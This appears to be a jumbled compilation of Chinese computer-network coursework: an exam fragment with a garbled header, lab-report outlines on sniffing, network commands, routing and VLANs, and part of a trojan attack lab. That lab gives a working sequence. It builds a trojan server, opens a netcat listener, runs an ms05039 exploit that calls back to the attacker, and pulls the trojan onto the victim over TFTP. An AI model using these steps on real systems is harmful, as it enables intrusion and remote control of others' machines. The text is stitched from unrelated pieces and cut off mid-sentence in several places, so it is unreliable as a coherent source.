计算机网络安全网络扫描实验报告

… …__…__…__…__…__…__… __…_ __… 心…中…学 教… _…_ __…__线__… __…_ __… __…__…_ 学号……__…__…__…__…__封__…__… __…号 班… … … __…__…_ __…__…__…__…__…__…_称…名密业… 专… _… ___… __… ___…__… __…__…__…_名…姓…………电子科技大学网络教育考卷（A1卷）

(20 年至20 学年度第 学期)

考试时间 年 月 日(120分钟) 课程 计算机网络安全 教师签名_____

大题号 一 二 三 四 五 六 七 八 九 十 合 计 得 分 一、名词解释(每题2分，共10分) 1. 密钥

2. 置换密码

3. 身份识别

4. 计算机漏洞 5. IPS

二、判断正误(正确打√，错误划×，每题1分，共10分) 1. 包过滤防火墙可以实现基于用户级别的控制。( )

2. 最小特权.纵深防御是网络安全原则之一。(

)

3. 密码保管不善属于操作失误的安全隐患。( )

4. 主机入侵检测软件安装在网络边界路由器上。(

计 算 机 网 络 安 全

《网络攻击技术与防御》

学 号： 1 10 姓 名： 专业班级：

指导教师：

1

目录

1、网络安全现状。 2、网络攻击常用步骤。 3、网络攻击工具介绍。 4、怎样防御网络工具的攻击。 5、几种不同类型工具与防御方法。 6、总结。

2

1、网络安全现状

随着计算机和通信技术的发展，网络信息的安全和保密已成为一个至关重要且急需解决的问题。计算机网络所具有的开放性、互连性和共享性等特征使网上信息安全存在着先天不足，再加上系统软件中的安全漏洞以及所欠缺的严格管理，致使网络易受攻击，因此网络安全所采取的措施应能全方位地针对各种不同的威胁，保障网络信息的保密性、完整性和可用性。现有网络系统和协议还是不健全、不完善、不安全的。

2、网络攻击常用步骤

一般网络攻击都分为三个阶段，即攻击的准备阶段、攻击的实施阶段和攻击的善后阶段。

攻击的准备阶段：确定攻击目的、准备攻击工具和收集目标信息。 攻击的实施阶段：实施具体的攻击行动。一般步骤如下： 1. 隐藏自己的位置 2. 利用收集到的信息获

、

《计算机网络安全》

实验报告与习题册

2012 / 2013 学年 第1学期

系 别 专 业 班 级 姓 名 学 号 指导教师

《计算机网络安全》实验报告与习题

实验一 使用网络监听工具

一、实验要求与目的

1.使用监听工具NetXray

2.熟悉Sniffer的原理及被监听的危害 二、实验内容：

1.熟悉NetXray界面

2.设置过滤条件（如网络病毒），过滤报文 3.监视本机的业务流量 三、实验步骤

四、实验结果

2

《计算机网络安全》实验报告与习题 五、习题

1.TCP和UDP之间的主要区别是什么？

2.网桥、路由器和网关的主要区别是什么？

3.将一个C类网络分成8个子网，若我们用的网络号为202.204.125.试写出网络划分的方法和子网掩码。

3

《计算机网络安全》实验报告与习题

网络安全

《计算机网络安全》实验报告

实验序号：7 实验项目名称：木马攻击与防范实验

网络安全

3)选择菜单“设置”->“配置服务程序” ;

4)设置访问口令为“1234567” ,其它为默认值，点击 “确定”生成木马的 服务端程序 G_SERVER.EXE。 5)将生成的木马服务程序 G_SERVER.EXE 拷贝到 tftp 服务的目录即 C:\攻防 \tftp32。

网络安全

6)运行 tftpd32.exe。保持此程序一直开启，用于等待攻击成功后传输木马 服务程序。

步骤 2:进行攻击，将木马放置在被攻击端 1)对靶机 P3 进行攻击，首先运行 nc -vv -l -p 99 接着再开一个 dos 窗口，运行 ms05039 192.168.20.23 192.168.20.1 99 1 2)攻击成功后，在运行 nc -vv -l -p 99 的 dos 窗口中出现提示，若攻击不

网络安全

成功请参照“缓冲区溢出攻击与防范实验” ,再次进行攻击。

3)在此窗口中运行 tftp -i 192.168.20.1 get g_server.exe 将木马服务程序 G_server.exe 上传到靶机 P3 上，并直接输入 g_server

计算机网络 实 验 报 告

学生姓名 学 号 专业班级 指导教师 王建新

学 院 信息科学与工程学院 完成时间 2014年5月

实验一 网络路由层模拟协议

一．实验目的与要求

1.掌握VB、VC++、VS或JAVA等集成开发环境编写路由仿真程序的方法； 2.理解并掌握距离向量路由协议和链路状态路由协议的工作原理。

二．实验内容与实现原理

1.实验内容（1，2任选其一实现）

1.模拟距离向量路由算法的路由表交换过程，演示每轮交换后路由表的变化。

基本要求（动态生成网络拓扑图，节点间的距离随机生成。从初始路由表开始，进行交换路由表，演示每轮交换后的路由表的变化。观察和讨论多少轮交换后路由表稳定）

2.实现链路状态路由算法的模拟。

基本要求（动态生成网络拓扑图，节点间的距离随机生成。每个节点生成自己的链路状态分组，依据收到的链路状态表得到整体网络结构，在得到的整体网络结构上用最短路径算法，生成每个节点的路由表）

进一步的要求：可以将模拟实验的每个节点程序部署在不同的电脑上，通过socket通信程序完成路由表信息或者链路状态分组的发送（与实验三结合）。请用两台机器虚拟成多个网络节点

《计算机网络》

实 验 报 告

专 业：计算机科学与技术 学 号： 姓 名： 指导老师：

江苏科技大学计算机科学与工程学院

2013 年 6 月

实验一 常用网络命令

实验学时：2学时 实验类型：验证 实验要求：必做

一、实验目的

掌握常用的网络命令，了解网络的运行状态，对网络进行简单的测试、分析和诊断。

二、实验原理及内容

实验内容

1、网络层常用命令：ping，ipconfig，arp，route，tracert 2、统计命令：netstat

实验步骤

1、用ping命令，测试网络节点的连通性，测试教师指定的机器是否可连通；

2、利用ipconfig命令查看主机的IP地址、MAC地址，以及主要的网络参数；

3、利用arp命令查看主机的地址解析表，并增加和删除一些主机的解析记录；

4、利用route命令查看主机的路由表，并增加和删除一些路由记录； 5、利用tracert命令查看到指定主机之间的所经过路由器，分析路由的路径；

6、利用netstat命令查看主机路由信息，以及TCP、UDP通信的连接信息和统计数据；

三、实验组织运行要求

1、学生在进行实验前必须进行充分的预习，熟悉实验内容；

2、学生严格遵守实验室

《计算机网络》

专 业：信息管理与信息系统（网络营销）学 号：姓 名：朱鹏飞指导老师：

实 验 报 告

1142806132 蒋玉宇 1

实验项目一：常用网络命令的使用

(1) 掌握几种常用的网络命令，通过使用这些命令能检测常见

网络故障；

(2) 理解各命令的含义，并能解释其显示内容的意义； (3) 按实验内容要求执行各命令，认真记录实验结果； (4) 对实验结果能解释其含义。 实验项目二：网络协议分析

(1) 使学生掌握利用网络协议的分析、检测软件对实际网络中

的各种协议进行分析的方法；

(2) 通过各协议的分析，进一步理解各协议的工作原理及其相

应的报文格式；

(3) 抓取ARP、TCP、UDP、IP、ICMP、DNS等协议的数据包。 实验项目三：常用应用层协议

(1) 了解常用应用层协议（DNS、FTP、TELNET、SMTP、POP、

HTTP等）的基本原理、工作过程等； (2) 熟悉FTP、TELNET、OUTLOOK使用方法； (3) 认真记录运行结果；

(4) 结合结果对相应协议进行分析。 实验项目四：DHCP和DNS服务器的配置

(1) 在Windows 2K下DHCP服务器的建立、配置和管理； (

《计算机网络》

实 验 报 告

专 业：计算机科学与技术 学 号： 姓 名： 指导老师：

江苏科技大学计算机科学与工程学院

2013 年 6 月

实验一 常用网络命令

实验学时：2学时 实验类型：验证 实验要求：必做

一、实验目的

掌握常用的网络命令，了解网络的运行状态，对网络进行简单的测试、分析和诊断。

二、实验原理及内容

实验内容

1、网络层常用命令：ping，ipconfig，arp，route，tracert 2、统计命令：netstat

实验步骤

1、用ping命令，测试网络节点的连通性，测试教师指定的机器是否可连通；

2、利用ipconfig命令查看主机的IP地址、MAC地址，以及主要的网络参数；

3、利用arp命令查看主机的地址解析表，并增加和删除一些主机的解析记录；

4、利用route命令查看主机的路由表，并增加和删除一些路由记录； 5、利用tracert命令查看到指定主机之间的所经过路由器，分析路由的路径；

6、利用netstat命令查看主机路由信息，以及TCP、UDP通信的连接信息和统计数据；

三、实验组织运行要求

1、学生在进行实验前必须进行充分的预习，熟悉实验内容；

2、学生严格遵守实验室

淮海工学院 计算机工程学院

实验报告书

课 程 名： 《计算机网络》 题 目： 网络数据包捕获与分析 班 级： 信息121 学 号： 2012122502 姓 名： 葛伟

评语： 成绩： 指导教师： 批阅时间： 《 计算机网络 》实验报告 - 1 -

一、 实验目的

1、学习和掌握数据包分析工具Ethereal的使用； 2、利用Ethereal工具进行数据包的捕获；

3、利用Ethereal工具对捕获的数据包进行分析，正确解析出链路层数据帧、网络层IP数据包、运输层TCP报文段等各类数据包首部各字段内容； 4、能利用Ethereal工具分析数据包，详细了解协议的工作原理。

二、 实

《计算机网络》

实 验 指 导 书

武汉工程大学计算机学院

2014年9月

《计算机网络》实验一

实验名称：交换机的配置及VLAN的划分

实验目的： 熟悉交换机的CLI，加深理解VLAN、Trunk、Spanning Tree等一些相关的概念。 实验内容：对交换机进行一些基本的配置，学习对交换机各端口进行基本的参数设置，同时学习VLAN的划分和用ISL协议配置干线。

实验设备：两台Cisco Catalyst 1900 交换机、一台Cisco 2621路由器和四台PC。 实验步骤：

1、按实验原理图连接设备，为四台主机设置IP地址：

主机 A IP地址 172.16.10.2 子网掩码 255.255.255.0 默认网关 172.16.10.1 B

C 172.16.30.5 255.255.255.0 172.16.30.1 172.16.30.2 255.255.255.0 172.16.30.1 D 172.16.10.5 255.255.255.0 172.16.10.1 II

用“ping”命令检测各主机间的互通性。

III

2、将交换机与终端相